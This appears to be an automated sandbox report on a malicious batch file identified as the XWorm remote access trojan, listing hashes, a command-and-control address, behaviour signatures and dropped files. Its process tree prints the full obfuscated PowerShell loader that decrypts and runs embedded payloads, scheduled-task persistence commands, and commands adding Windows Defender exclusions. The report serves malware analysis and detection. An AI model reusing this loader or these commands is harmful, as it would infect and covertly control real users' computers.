Analysis

  • max time kernel
    90s
  • max time network
    99s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26-05-2024 02:43

General

  • Target

    ZchuzoCLIENTV3.bat

  • Size

    461KB

  • MD5

    d5a276beb0a9ab34d8ab304e9d511a48

  • SHA1

    79dbd692e151c4d9d3d852bc21b1a8fef7b26e6f

  • SHA256

    9a371c5191f7f8d74b87eb11fd8c75f9a9e50f6b6b2ed0e2fe54b9a8f9827408

  • SHA512

    ad5362a1fd966cc3b5e8c519d0e5d87bd98e02f915812037258aa3c826ec6d86e4d2429e449e1a232da57dd96050dee783681466cceba77354822f1b9b144901

  • SSDEEP

    12288:fDSZA9gZpmlN/WsxPm01HWyg8f9plO2QhQ+3U1/:fGf8NH+0ps8fblO291

Malware Config

Extracted

Family

xworm

Version

5.0

C2

another-limits.gl.at.ply.gg:63201

Mutex

xubtXp6ps981ap9u

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    $77wsappx.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ZchuzoCLIENTV3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R/dppgOhpePEb/+YI79jCEQq3x1zwsVvIMyS1keeutw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oHVtZunj5QiqGDq/USZArg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZoMcY=New-Object System.IO.MemoryStream(,$param_var); $ljKMi=New-Object System.IO.MemoryStream; $TQYiG=New-Object System.IO.Compression.GZipStream($ZoMcY, [IO.Compression.CompressionMode]::Decompress); $TQYiG.CopyTo($ljKMi); $TQYiG.Dispose(); $ZoMcY.Dispose(); $ljKMi.Dispose(); $ljKMi.ToArray();}function execute_function($param_var,$param2_var){ $TxuXG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XsLUp=$TxuXG.EntryPoint; $XsLUp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ZchuzoCLIENTV3.bat';$uPZqd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ZchuzoCLIENTV3.bat').Split([Environment]::NewLine);foreach ($VjFFC in $uPZqd) { if ($VjFFC.StartsWith(':: ')) { $tYAyV=$VjFFC.Substring(3); break; }}$payloads_var=[string[]]$tYAyV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:8
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_100_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_100.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4700
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_100.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_100.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4480
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R/dppgOhpePEb/+YI79jCEQq3x1zwsVvIMyS1keeutw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oHVtZunj5QiqGDq/USZArg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZoMcY=New-Object System.IO.MemoryStream(,$param_var); $ljKMi=New-Object System.IO.MemoryStream; $TQYiG=New-Object System.IO.Compression.GZipStream($ZoMcY, [IO.Compression.CompressionMode]::Decompress); $TQYiG.CopyTo($ljKMi); $TQYiG.Dispose(); $ZoMcY.Dispose(); $ljKMi.Dispose(); $ljKMi.ToArray();}function execute_function($param_var,$param2_var){ $TxuXG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XsLUp=$TxuXG.EntryPoint; $XsLUp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_100.bat';$uPZqd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_100.bat').Split([Environment]::NewLine);foreach ($VjFFC in $uPZqd) { if ($VjFFC.StartsWith(':: ')) { $tYAyV=$VjFFC.Substring(3); break; }}$payloads_var=[string[]]$tYAyV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1772
            • C:\Users\Admin\AppData\Local\Temp\cmd.exe
              "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
              6⤵
              • Executes dropped EXE
              PID:2980
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:820
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3676
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77wsappx.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3740
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77wsappx.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2172
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77wsappx" /tr "C:\ProgramData\$77wsappx.exe"
              6⤵
              • Creates scheduled task(s)
              PID:2888
  • C:\ProgramData\$77wsappx.exe
    C:\ProgramData\$77wsappx.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3468
  • C:\ProgramData\$77wsappx.exe
    C:\ProgramData\$77wsappx.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:1188

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\$77wsappx.exe

    Filesize

    440KB

    MD5

    0e9ccd796e251916133392539572a374

    SHA1

    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

    SHA256

    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

    SHA512

    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77wsappx.exe.log

    Filesize

    2KB

    MD5

    627073ee3ca9676911bee35548eff2b8

    SHA1

    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

    SHA256

    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

    SHA512

    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    62KB

    MD5

    e566632d8956997225be604d026c9b39

    SHA1

    94a9aade75fffc63ed71404b630eca41d3ce130e

    SHA256

    b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

    SHA512

    f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

    Filesize

    1KB

    MD5

    c81d47c3b95d180e012e8380740c4349

    SHA1

    702eded5bde64ab869985b0934655e18dbdc6a70

    SHA256

    cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc

    SHA512

    982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    981d4695b1c524eac18bbed0bad44e88

    SHA1

    ec03abf1a1fa8daffe0771ec264be31d84300b29

    SHA256

    c2e47ecbeb8051450f283c618e69f9de7ed115d962b8973180343f997914fc95

    SHA512

    2d17c0c5d0d5f72ae7c28914478144bdefb58c5accbfb370ea70af9275e0e1e2cc78200f910e8d44d179a3b7f4c092bdb2536a72e2a02433f2ad092e325be3b1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    59d37a8c588c83e806678c7fb5d1229f

    SHA1

    4396d68567f30f08e08a269802fe3f4784b88c5b

    SHA256

    c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

    SHA512

    19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    1a9fa92a4f2e2ec9e244d43a6a4f8fb9

    SHA1

    9910190edfaccece1dfcc1d92e357772f5dae8f7

    SHA256

    0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

    SHA512

    5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    dbed6207e0d3208bd0ee26b6c99307e3

    SHA1

    facbc3806e7596b021efd6a475cd407058223703

    SHA256

    631632aac60e6815fb18144cce66425db89b75c1e9d2c4af46d9d5148b6f5f72

    SHA512

    a0fbe5b0d32f20ffe23aebf00b77d41159ed7c01b2302efa6e6a0cc61e4c008538f44d2cf8c7ab6c062317d1c5762eebedf0d9a06a7fdde112d231f0a27fff8e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    cedfb5c5943c2ab470a28f4187bc7750

    SHA1

    c634b313064d775057dc00f8101799772d546f31

    SHA256

    b323dd9ecd1d7e51d695ad1b2fd14fe83e24fc1ea6bd7ad0322cca931b8a4263

    SHA512

    e50eb221c77d51bec6b43c520612679bb877a8749f5986b172bce443f6a989118f5796e727ce8dc599918588bfb9ee04ac7028b30d1a33d7bcf8a96322941321

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2fgopx1e.shn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\cmd.exe

    Filesize

    316KB

    MD5

    eb1071a4d69294f036d40d1fbf61c375

    SHA1

    5a934a89613197bc01b76f47fd13b1d5e25074ec

    SHA256

    becbbeaa24cca7e38ae19de32c9681f9b064e9fdbc60e1545091875d7008d13d

    SHA512

    412045afc8ebba68cb1c00e74bdc007aeb426a4110a9f7d898bb6cc65417246095cd01c1ff63dea860d371897e1857905c0403a7fdb575cc96ea404f9b5ee487

  • C:\Users\Admin\AppData\Roaming\startup_str_100.bat

    Filesize

    461KB

    MD5

    d5a276beb0a9ab34d8ab304e9d511a48

    SHA1

    79dbd692e151c4d9d3d852bc21b1a8fef7b26e6f

    SHA256

    9a371c5191f7f8d74b87eb11fd8c75f9a9e50f6b6b2ed0e2fe54b9a8f9827408

    SHA512

    ad5362a1fd966cc3b5e8c519d0e5d87bd98e02f915812037258aa3c826ec6d86e4d2429e449e1a232da57dd96050dee783681466cceba77354822f1b9b144901

  • C:\Users\Admin\AppData\Roaming\startup_str_100.vbs

    Filesize

    115B

    MD5

    43cb2ab54a3805f47352eae51aefb572

    SHA1

    2a579105ab98a017140616961936afd1a894ecae

    SHA256

    e6809d7975256ebee58f550bd676f78c15abc82c7fbe657f568c18ec5c7ff1f6

    SHA512

    df83b7877dfda4483cac588917cbb6855e99ca775cd6cbe3ac347c697a022e0e5cee9edc2c788c79601e9d27d0c9a86f93e29b0fff559ffb55b120f52a41e3b8

  • memory/8-13-0x000001D9C6D10000-0x000001D9C6D18000-memory.dmp

    Filesize

    32KB

  • memory/8-12-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/8-9-0x000001D9C6DA0000-0x000001D9C6DC2000-memory.dmp

    Filesize

    136KB

  • memory/8-10-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/8-11-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/8-14-0x000001D9C6DF0000-0x000001D9C6E72000-memory.dmp

    Filesize

    520KB

  • memory/8-104-0x00007FFCF3983000-0x00007FFCF3985000-memory.dmp

    Filesize

    8KB

  • memory/8-0-0x00007FFCF3983000-0x00007FFCF3985000-memory.dmp

    Filesize

    8KB

  • memory/8-103-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/1772-50-0x0000019B70400000-0x0000019B70410000-memory.dmp

    Filesize

    64KB

  • memory/3468-114-0x000001DCED6B0000-0x000001DCED6F6000-memory.dmp

    Filesize

    280KB

  • memory/4700-26-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-16-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-30-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-25-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-27-0x00007FFCF3980000-0x00007FFCF4442000-memory.dmp

    Filesize

    10.8MB